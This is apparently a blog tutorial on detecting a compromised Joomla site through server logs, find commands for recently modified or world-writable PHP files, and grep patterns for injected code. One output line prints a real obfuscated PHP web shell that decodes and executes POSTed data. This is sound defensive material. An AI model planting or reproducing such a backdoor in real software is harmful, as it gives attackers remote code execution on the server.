Find Out If Your Joomla Site Has Been Hacked

Overview

Like every popular Content Management System, there is always going to be at risk of being attacked or hacked. This article explore some methods to try to detect the integrity of your website.

Monitor your site regularly.

Check web server logs

Check primarily for brute force attacks and attempts to upload files. With Apache in Ubuntu that would tipically mean to analyze /var/log/apache2/access.log and /var/log/apache2/error.log

For example, there is someone playing around one of my Joomla websites trying to explode Wordpress vulnerabilities:

/var/log/apache2/$ grep POST access.log
XXXXXXXX.com:80 193.XXX.XXX.XXX - - [26/Jan/2017:00:07:03 +0000] "POST /wp-content/themes/method/lib/scripts/dl-skin.php HTTP/1.1" 500 363 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
XXXXXXXX.com:80 193.XXX.XXX.XXX - - [26/Jan/2017:00:07:14 +0000] "POST /wp-content/themes/modular/lib/scripts/dl-skin.php HTTP/1.1" 500 363 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
XXXXXXXX.com:80 193.XXX.XXX.XXX - - [26/Jan/2017:00:07:25 +0000] "POST /wp-content/themes/myriad/lib/scripts/dl-skin.php HTTP/1.1" 500 363 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
XXXXXXXX.com:80 193.XXX.XXX.XXX - - [26/Jan/2017:00:07:56 +0000] "POST /wp-content/themes/persuasion/lib/scripts/dl-skin.php HTTP/1.1" 500 363 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"

Detect modified PHP files

You can look for PHP files that were modified recently, or after some date you are sure didn’t perform anything to the source code.

That would show new possibly uploaded scripts or modified files with injected code in them.

Find files modified recently

To find recently modified files: find /path/to/dir -type f -mtime -7 -ls. The -mtime parameter detects when file’s data was last modified n24* hours ago, in that case we analyze the previous 7 days.

$ find . -type f -mtime -7 -ls

Find files modified after a specific date

List files in given directory modified after given date find /path/to/dir -newermt “yyyy-mm-dd”.

 -newerXY reference
Compares the timestamp of the current file with reference.  The reference argument is normally the name  of  a  file
(and  one  of its timestamps is used for the comparison) but it may also be a string describing an absolute time.  X
and Y are placeholders for other letters, and these letters select which time belonging to how reference is used for
the comparison.
-a   The access time of the file reference
-B   The birth time of the file reference
-c   The inode status change time of reference
-m   The modification time of the file reference
-t   reference is interpreted directly as a time

In this example we look for files modified with the current directory as the base directory and modified after “2016-12-01”.

$ find . -newermt "2017-01-25" -ls
1089538    4 drwxr-xr-x   2 marcanuy www-data     4096 Jan 25 04:13 ./website/logs

Finding hacked files with pattern matching

Most of the time injected code will be obfuscated, making it harder to look for obvious patterns, but we can try some alternatives though.

This code would be tipically inserted as the first line of the PHP file, starting with a variable, so we can look for that pattern, first line starting with <?php $:

$ grep -m 1 -r '^<?php \$' .</kbd>

Output:

./website/components/com_users/views/profile/tmpl/default_params.php:<?php $fields = $this->form->getFieldset('params'); ?>
./website/administrator/cache/com_ajax3j/9411v11.php:<?php $coi=chr(97).chr(115)."\x73".chr(101)."\x72"."\x74";$zioj=chr(98).chr
(97)."\x73"."\x65"."\x36".chr(52)."\x5f"."\x64".chr(101)."c"."\x6f".chr(100).chr(101);$jd=chr(115)."\x74".chr(114)."\x5f"."r".chr(111)
."\x74"."1"."3";@$coi(@$zioj(@$jd($_POST[chr(100).chr(97)."t".chr(97)])));die(); ?>

First line of the output looks fine, but the second line looks a bit more than suspicious code, we can decode it and understand what it is doing before removing it.

Files with wrong permissions

Check out for writable upload directories. The find command can be used to scan for files and folder with permission 777.

$ find . -type f,d -perm 0777 -print 

-perm mode File's permission bits are exactly mode (octal or symbolic). Since an exact match is required, if you want to use this form for symbolic modes, you may have to specify a rather complex mode string. For example -perm g=w will only match files which have mode 0020 (that is, ones for which group write permission is the only permission set). It is more likely that you will want to use the / or - forms, for example -perm -g=w, which matches any file with group write permission. See the EXAMPLES section for some illustrative examples.

Also we can choose many file types at once separating them with ‘,’ like -type=d,f where d stands for directory and f for files.

Then we can modify it a bit to scan through all the 777 files on the server and show ones with .php to look for uploaded scripts:

$ find . -name "*php" -type f -perm 777

Conclusion

A lot of people recommends to install a clean backup after being hacked, this approach will fail sooner or later because you need to know what failed to prevent happening again.

This article covers some basic strategies for identifying compromised files, attacks are constant with varying methods so it is important to know commands and strategies to recover our sites and keep them safe.

References

• http://www.gregfreeman.io/2013/how-to-tell-if-your-php-site-has-been-compromised/
• https://www.bluebridgedev.com/hacked-joomla-files
• https://www.joomshaper.com/blog/my-joomla-site-was-hacked-what-to-do
• https://www.google.com/transparencyreport/safebrowsing/diagnostic/index.html
• The Joomla Hacking Compendium https://www.exploit-db.com/papers/15780/